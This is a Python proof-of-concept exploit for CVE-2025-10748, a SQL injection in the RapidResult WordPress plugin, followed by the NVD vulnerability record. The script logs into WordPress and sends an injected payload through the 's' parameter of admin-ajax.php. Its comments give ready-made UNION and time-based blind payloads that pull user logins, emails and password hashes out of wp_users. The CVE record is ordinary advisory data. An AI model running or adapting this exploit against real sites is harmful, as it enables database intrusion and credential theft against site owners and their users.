CVE-2025-10748

import requests import sys # CVE-2025-10748 PoC - WordPress RapidResult Plugin SQL Injection # Target: WordPress site with RapidResult plugin <= 1.2 def exploit_sqli(target_url, username, password, payload): """ Exploit SQL injection in RapidResult plugin via 's' parameter """ # Step 1: Authenticate to WordPress login_url = target_url + '/wp-login.php' session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Authentication failed') return None print('[+] Authentication successful') # Step 2: Exploit SQL Injection via 's' parameter exploit_url = target_url + '/wp-admin/admin-ajax.php' # SQL Injection payload - extracts user login and email sqli_payload = { 'action': 'rapidresult_search', 's': payload # Vulnerable parameter } # Example payloads: # Boolean-based blind: " OR (SELECT IF(1=1,SLEEP(5),0))-- " # Union-based: "' UNION SELECT 1,2,3,4,user_login,user_email FROM wp_users-- " # Time-based: "'; SELECT IF(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),1,1)='5',SLEEP(5),0)-- " print(f'[*] Sending malicious payload: {payload}') resp = session.post(exploit_url, data=sqli_payload, timeout=30) return resp.text if __name__ == '__main__': if len(sys.argv) < 5: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <payload>') print('Example: python exploit.py http://target.com admin admin123 "\' UNION SELECT 1,2,3,4,user_login,user_email FROM wp_users-- "') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] payload = sys.argv[4] result = exploit_sqli(target, user, pwd, payload) if result: print('[+] Response received') print(result[:500])

{"cve": {"id": "CVE-2025-10748", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:41.487", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RapidResult plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 1.2. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level permissions and above to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/rapidresult/tags/1.2/rapidresult.php#L112", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3383652/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4e5d7d04-f73a-48ea-81e3-36a514c76cc6?source=cve", "source": "[email protected]"}]}}